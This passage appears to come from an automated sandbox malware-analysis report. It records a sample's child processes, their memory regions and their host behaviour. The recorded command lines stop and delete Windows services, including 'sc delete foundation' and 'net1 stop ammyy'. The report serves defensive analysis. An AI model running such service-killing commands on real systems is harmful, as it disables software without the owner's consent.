| Remarks | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8d8 |
| Parent PID | 0xb84 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B68
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x000b0000 | 0x00116fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x002fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0048ffff | Private Memory | Readable, Writable |
|
|
|
- |
| net.exe | 0x00510000 | 0x00527fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x0072ffff | Private Memory | Readable, Writable |
|
|
|
- |
| winnsi.dll | 0x73df0000 | 0x73df6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x73e00000 | 0x73e1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mpr.dll | 0x73e20000 | 0x73e31fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x73e40000 | 0x73e4efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x73e50000 | 0x73e68fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| samcli.dll | 0x73e70000 | 0x73e7efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| browcli.dll | 0x73e80000 | 0x73e8cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74bb0000 | 0x74bb8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74d90000 | 0x74debfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74df0000 | 0x74e2efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74e50000 | 0x74e57fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75120000 | 0x7512bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75130000 | 0x7518ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75290000 | 0x752d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75440000 | 0x7554ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x75670000 | 0x75675fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x75900000 | 0x759abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76e20000 | 0x76e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x76f00000 | 0x76feffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x77130000 | 0x771cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000771d0000 | 0x771d0000 | 0x772c9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000772d0000 | 0x772d0000 | 0x773eefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x775d0000 | 0x7774ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Process #15: net.exe
0
0
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\windows\syswow64\net.exe |
| Command Line | net.exe stop foundation |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:01:14, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:24 |
| Remarks | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x540 |
| Parent PID | 0xbac (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
4F4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x0044ffff | Private Memory | Readable, Writable |
|
|
|
- |
| net.exe | 0x00510000 | 0x00527fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0073ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x0090ffff | Private Memory | Readable, Writable |
|
|
|
- |
| winnsi.dll | 0x73df0000 | 0x73df6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x73e00000 | 0x73e1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mpr.dll | 0x73e20000 | 0x73e31fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x73e40000 | 0x73e4efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x73e50000 | 0x73e68fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| samcli.dll | 0x73e70000 | 0x73e7efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| browcli.dll | 0x73e80000 | 0x73e8cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74bb0000 | 0x74bb8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74d90000 | 0x74debfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74df0000 | 0x74e2efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74e50000 | 0x74e57fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75120000 | 0x7512bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75130000 | 0x7518ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75290000 | 0x752d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75440000 | 0x7554ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x75670000 | 0x75675fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x75900000 | 0x759abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76e20000 | 0x76e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x76f00000 | 0x76feffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x77130000 | 0x771cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000771d0000 | 0x771d0000 | 0x772c9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000772d0000 | 0x772d0000 | 0x773eefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x775d0000 | 0x7774ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Process #16: net1.exe
17
0
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\windows\syswow64\net1.exe |
| Command Line | C:\Windows\system32\net1 stop foundation |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:01:14, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:24 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb0 |
| Parent PID | 0x540 (c:\windows\syswow64\net.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
950
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| net1.exe | 0x00080000 | 0x000a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| locale.nls | 0x000b0000 | 0x00116fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x0027ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0031ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x0045ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x006bffff | Private Memory | Readable, Writable |
|
|
|
- |
| ntdsapi.dll | 0x739f0000 | 0x73a07fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| samlib.dll | 0x73a10000 | 0x73a21fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x73a30000 | 0x73a40fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netmsg.dll | 0x73d90000 | 0x73d91fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| logoncli.dll | 0x73db0000 | 0x73dd1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dsrole.dll | 0x73de0000 | 0x73de8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x73e40000 | 0x73e4efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x73e50000 | 0x73e68fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| samcli.dll | 0x73e70000 | 0x73e7efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| browcli.dll | 0x73e80000 | 0x73e8cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74bb0000 | 0x74bb8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74d90000 | 0x74debfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74df0000 | 0x74e2efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74e50000 | 0x74e57fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75120000 | 0x7512bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75130000 | 0x7518ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75290000 | 0x752d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75440000 | 0x7554ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x75670000 | 0x75675fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x75900000 | 0x759abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x75cc0000 | 0x75cf4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76e20000 | 0x76e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x76f00000 | 0x76feffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x77130000 | 0x771cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000771d0000 | 0x771d0000 | 0x772c9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000772d0000 | 0x772d0000 | 0x773eefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x775d0000 | 0x7774ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
4 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 30 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 2 |
|
2 | |
| Write | STD_ERROR_HANDLE | size = 52 |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | NETMSG | base_address = 0x73d90000 |
|
1 | |
| Get Handle | c:\windows\syswow64\net1.exe | base_address = 0x80000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\net1.exe, file_name_orig = C:\Windows\SysWOW64\net1.exe, size = 260 |
|
1 |
Service (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Service Name | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-02 21:37:13 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10927261 |
|
1 |
Process #17: sc.exe
8
0
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\windows\syswow64\sc.exe |
| Command Line | sc delete foundation |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:01:14, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:24 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x938 |
| Parent PID | 0xbc0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
768
0x
8F0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| sc.exe | 0x00030000 | 0x0003bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000040000 | 0x00040000 | 0x00041fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00046fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| apisetschema.dll | 0x00050000 | 0x00050fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00063fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00070fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00081fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| sc.exe.mui | 0x00090000 | 0x0009ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x0019ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0027ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
- |
| kernelbase.dll.mui | 0x003d0000 | 0x0048ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0054ffff | Private Memory | Readable, Writable |
|
|
|
- |
| wow64win.dll | 0x74d90000 | 0x74debfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74df0000 | 0x74e2efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74e50000 | 0x74e57fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75120000 | 0x7512bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75130000 | 0x7518ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75290000 | 0x752d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75440000 | 0x7554ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x75900000 | 0x759abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76e20000 | 0x76e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x76f00000 | 0x76feffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x77130000 | 0x771cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000771d0000 | 0x771d0000 | 0x772c9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000772d0000 | 0x772d0000 | 0x773eefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x775d0000 | 0x7774ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 98 |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\sc.exe | base_address = 0x30000 |
|
1 |
Service (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-02 21:37:13 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10927105 |
|
1 |
Process #18: net1.exe
17
0
| Information | Value |
|---|---|
| ID | #18 |
| File Name | c:\windows\syswow64\net1.exe |
| Command Line | C:\Windows\system32\net1 stop ammyy |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:01:14, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:24 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x744 |
| Parent PID | 0x8d8 (c:\windows\syswow64\net.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
918
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| net1.exe | 0x00080000 | 0x000a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| locale.nls | 0x000b0000 | 0x00116fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x0019ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x0020ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0039ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x0053ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0075ffff | Private Memory | Readable, Writable |
|
|
|
- |
| ntdsapi.dll | 0x739f0000 | 0x73a07fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| samlib.dll | 0x73a10000 | 0x73a21fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x73a30000 | 0x73a40fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netmsg.dll | 0x73d90000 | 0x73d91fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| logoncli.dll | 0x73db0000 | 0x73dd1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dsrole.dll | 0x73de0000 | 0x73de8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x73e40000 | 0x73e4efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x73e50000 | 0x73e68fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
